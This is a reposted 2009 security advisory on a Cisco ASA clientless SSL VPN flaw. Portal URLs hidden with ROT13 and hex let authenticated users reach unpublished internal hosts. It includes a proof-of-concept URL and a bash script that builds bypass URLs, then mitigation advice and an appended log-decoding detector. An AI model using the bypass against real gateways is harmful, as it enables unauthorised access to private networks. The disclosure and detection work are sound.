0day.today - Biggest Exploit Database in the World.
Cisco ASA <= 8.x VPN SSL module Clientless URL-list control bypass
# Title: Cisco ASA <= 8.x VPN SSL module Clientless URL-list control bypass
# CVE-ID: ()
# OSVDB-ID: ()
# Author: David Eduardo Acosta Rodriguez
# Published: 2009-12-17
# Verified: no

=============================================
INTERNET SECURITY AUDITORS ALERT 2009-013
- Original release date: December 7th, 2009
- Last revised: December 16th, 2009
- Discovered by: David Eduardo Acosta Rodriguez
- Severity: 4/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
Cisco ASA <= 8.x VPN SSL module Clientless URL-list control bypass

II. BACKGROUND
-------------------------
Cisco VPN SSL [1] is a module for Cisco ASA and Cisco Integrated Services Routers that extends network resources to virtually any remote user with access to the Internet and a web browser.

III. DESCRIPTION
-------------------------
Cisco VPN SSL Clientless lets administrators define rules for the specific targets within the private network that WebVPN users will be able to access. These targets are published as links on the VPN SSL home page. The links (URLs) are protected (obfuscated) by applying a ROT13 substitution [2] and converting the ASCII characters to hexadecimal. Because this is an encoding with no secret, it hides the target but does not restrict which targets the gateway will fetch.

A user with a valid account and without "URL entry" can access any internal/external resource simply by taking a URL, encoding it with ROT13, converting the ASCII characters to hexadecimal and appending the resulting string to the Cisco VPN SSL URL.

IV. PROOF OF CONCEPT
-------------------------
Using the URL http://intranet, published on an internal server (not accessible from the home page):

1. Convert string to ROT13: uggc://vagenarg
2. Change ASCII chars to HEX: 756767633a2f2f766167656e617267
3. Append string to Cisco VPN SSL: https://[CISCOVPNSSL]/+CSCO+00756767633a2f2f766167656e617267++

This is a simple PoC for easy demonstration:

#!/bin/bash
# Encode a URL the way the clientless portal does: ROT13, then ASCII to hex.
echo -n "write URL:"
read -r a
# ROT13 the input, hex-dump it, then strip spaces and newlines from the dump
b=$(echo -n "$a" | tr '[a-m][n-z][A-M][N-Z]' '[n-z][a-m][N-Z][A-M]' | od -An -tx1 | tr -d ' \n')
echo -n "URL "
echo -n "https://[CISCOVPNSSL]/+CSCO+00"
echo -n "$b"
echo -n "++"
echo ""

V. BUSINESS IMPACT
-------------------------
Users with a valid account can surf to internal/external resources, bypassing the controls in the home page.

VI. SYSTEMS AFFECTED
-------------------------
Cisco ASA <= 8.x are vulnerable.

VII. SOLUTION
-------------------------
Always set a "webtype" ACL and "filter" to block access in Web VPN SSL (not activated by default). Included in Cisco site now.
Follow the recommendations from "Cisco Understanding Features Not Supported in Clientless SSL VPN" [3].

VIII. REFERENCES
-------------------------
[1] www.cisco.com/web/go/sslvpn
[2] http://en.wikipedia.org/wiki/ROT13
[3] http://www.cisco.com/en/US/docs/security/asa/asa82/configuration/guide/webvpn.html#wp999589
http://tools.cisco.com/security/center/viewAlert.x?alertId=19609
http://www.isecauditors.com

IX. CREDITS
-------------------------
This vulnerability has been discovered by David Eduardo Acosta Rodriguez (deacosta (at) isecauditors (dot) com, dacosta (at) computer (dot) org).
Thanks to Juan Galiana Lara (jgaliana (at) isecauditors (dot) com) for additional research.

X. REVISION HISTORY
-------------------------
December 7, 2009: Initial release.
December 16, 2009: Last revision.

XI. DISCLOSURE TIMELINE
-------------------------
December 9, 2009: Vendor contacted
December 9, 2009: Vendor response, they include our mitigation proposal in their website and start the analysis of correction required.
December 16, 2009: Vendor confirms remediation and public statement.
December 17, 2009: Sent to lists.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

# 0day.today [2024-11-16] #
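Because the obfuscation in section III is reversible without any secret, a defender can decode the `+CSCO+00...++` paths seen in gateway or proxy logs and compare the real targets against the published URL list. The following is an added example, not part of the original advisory or Cisco's code; the "user path" log format, the `PUBLISHED` set and the function names are assumptions made for illustration.

```python
import codecs
import re
from urllib.parse import urlsplit

# Path layout from the advisory: /+CSCO+00<hex of ROT13(url)>++
CSCO_RE = re.compile(r"/\+CSCO\+00((?:[0-9a-fA-F]{2})+)\+\+")

def decode_clientless_path(path):
    """Return the cleartext target URL carried in a clientless path, or None."""
    m = CSCO_RE.search(path)
    if m is None:
        return None
    try:
        rot13_text = bytes.fromhex(m.group(1)).decode("ascii")
    except UnicodeDecodeError:
        return None  # not the plain ASCII encoding the advisory describes
    return codecs.decode(rot13_text, "rot_13")

def unpublished_targets(log_lines, published):
    """Return (user, url) pairs whose decoded scheme/host is not published."""
    findings = []
    for line in log_lines:
        user, _, path = line.partition(" ")
        url = decode_clientless_path(path)
        if url is None:
            continue
        parts = urlsplit(url)
        if (parts.scheme, parts.hostname) not in published:
            findings.append((user, url))
    return findings

# Constructed sample data (assumed "user path" log format, not real ASA output).
PUBLISHED = {("http", "portal")}
SAMPLE_LOG = [
    "alice /+CSCO+00756767633a2f2f636265676e79++",      # http://portal
    "bob /+CSCO+00756767633a2f2f766167656e617267++",    # http://intranet
    "carol /+CSCOE+/logon.html",                        # no encoded target
]

if __name__ == "__main__":
    for user, url in unpublished_targets(SAMPLE_LOG, PUBLISHED):
        print(f"{user} requested unpublished target {url}")
```

Log review of this kind only detects the behaviour; enforcement still comes from the "webtype" ACL and "filter" named in section VII.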